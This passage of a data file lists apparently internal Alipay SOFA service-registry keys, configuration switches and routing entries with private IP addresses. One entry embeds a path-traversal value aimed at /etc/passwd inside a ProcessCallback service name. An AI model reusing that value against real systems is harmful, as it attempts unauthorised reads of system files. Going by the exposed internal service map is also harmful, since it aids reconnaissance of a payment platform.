D#@#DEFAULT_GROUP","com.alipay.kbcateringprod.common.service.facade.serve.api.ServeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.groovy.PubliccoreGroovyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.settleschema.SettleSchemaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.MrchisCommonValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenter.bizservice.facade.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.batchpay.common.service.facade.withholding.WithholdingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.notify.common.service.facade.SendDingtalkCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.paymentmng_pacioliDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotvilla.common.service.facade.api.manager.QuotEventManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.59.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.ctuRiskStrategy.CtuRiskStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.CraftsmanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bksupplychaincore.common.service.facade.receivable.api.SccReceivableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mfinsnsprod:name=com.alipay.mfinsnsprod.ldc.MFinSnsProdLdcDrmConfig.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaymember.common.service.facade.config.service.AdvertisementConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaconfigsvr.common.service.facade.api.MatchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppOpsLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.closeRewardAmountQueryFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:deleteCommunityPraiseRewardAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpaasgw.common.service.api.facade.AppFacade:1.0:imgs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.openhome.DeveloperMobileFastAuditFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.operation.OperationInfoUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:merchantAddressToShopSyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.morderprod:name=com.alipay.morderprod.switch.excludeArByMidPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dk.common.service.facade.open.api.scene.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insleads.common.service.facade.InsLeadsTrailFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradefront.service.trade.settle.api.TradeFrontSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CollectRewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:definriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeoutcenter.common.service.facade.api.TimeoutExecutor:1.0:apfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_MQ_ZPROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.rayag.facade.service.construct.GraphViewConstructService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zeldatwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.vtask.TaskContentRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.FinanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:microloan_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpromoprod.facade.activity.ActivityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.92.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-antfortuneall-service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:rpc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.golden.common.facade.charge.config.ChargeConfigureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.api.TableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:insclaimcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.chair.businessgray.drm.renderGray.renderGrayAccountLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.gfinvoice.facade.invoice.InvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.revcore.common.service.facade.api.industry.IndustryPoolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paymentmngTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.timeSequenceTimeRecoverSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopencore.common.service.live.facade.LiveWelfareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.datasync.DataSyncManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_IGTRANSFER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.38.60.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.pushMessage2Cloud,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.115.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_DAYU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antforest.common.service.facade.ForestUserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.material.CreativeMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:pcardcoreAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:finmng-certFlowPMCCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_antqa_supportIntelligentKeywordGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pledgecore.common.service.facade.spi.PledgeAssetConsultService:1.0:fintransfercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.bizfacade.FundBizLuckyMoneyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.FundQuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvPlanManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcrecon_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentDownloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntOutfluxDepositbackHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsfree.facade.spi.OpsfreeActionProcessSpi:1.0:unirelease@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype.ActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.betaSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.GiftCrowdConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.capacitystudio.facade.CapacityRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:antConnector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:cashier@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openFinMngResourceStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicreateweb.api.Editor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.core.dal.service.DVProtocolDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.taskAssignWait,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.change.api.OpscloudQueryService:1.0:ocp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.70.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemMachineAuditExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.spi.facade.FinAssetAccessDataFacade:1.0:ENDOWMENT_INSURANCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverInGzoneService:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.EbppRetryChargeoffConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.linksec.facade.UrlCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.decisionRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.tester.facade.AgAccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.6.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaymentmng.common.service.facade.UserTopupQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MRCHPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResourceValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserFreezeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.backtracking.OdpsUserSearchTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.PromoFundLosePlatformInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceAnnualAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_CHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.xview.conf.drm.XViewConfClientDrm.timeoutForClientConfRefreshLock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.tagsJSONStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:PromoPlatform_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:cloudideweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.newsSwtichPubTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:signDetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsccalipay.jiebei.facade.service.RiskQuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.reindeer.EntityBaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.biz.shared.message.base.MessageHandler:1.0:hbPayFinishMsgHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.live.ProdLiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.manage.DataNodeVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditsffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.biz.service.prod.simulateagreementpay.SimulateAgreementPayProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.OrderFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.PromotionCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ProductEventMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.AutoInsAuthFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.dbSwtichFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.tntInst.TntInstApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.96.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.176.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileacauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.common.SmcpPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_QINYUE_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbschedules.common.serivce.facade.CargoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementInconsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.changesdk.action.ChangeActionExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.191.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:loginantzhixin@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.priv.PricemngPricePrivItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.DonateFeedbackMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.132.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openauth.common.service.facade.rpc.PreAuthManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-49#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csmobile.servie.facade.api.MbillContextService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_BUMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.core.schduler.v2.api.FincomGeneralFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.oyz.core.facade.api.DictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.smartFoParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydgp.common.service.facade.link.TableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.128.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.InstAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.MSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxBcodeDefinitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.ZproxyRPvSofaService:1.0:zproxyRForM@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.ArOptLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.211.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP-S-OUT-GOTONE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.68.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.facade.asset.InstAssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.DockerfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.training.api.NewCstMaterialOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aftscmd.spi.impl.iothub.api.BizAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.process.OpenUniformProcessReviewBindManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:compmng-uploadVoucherCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.hyp.common.service.facade.AbossMigrateCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.188.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.api.internal.UserMigrateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.FlowManagementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.custmng.CustmngManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.outer.SubAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.api.ssu.SsuConfigForMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.158.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditbenefit.commonscene.trigger@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.config.WithdrawConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.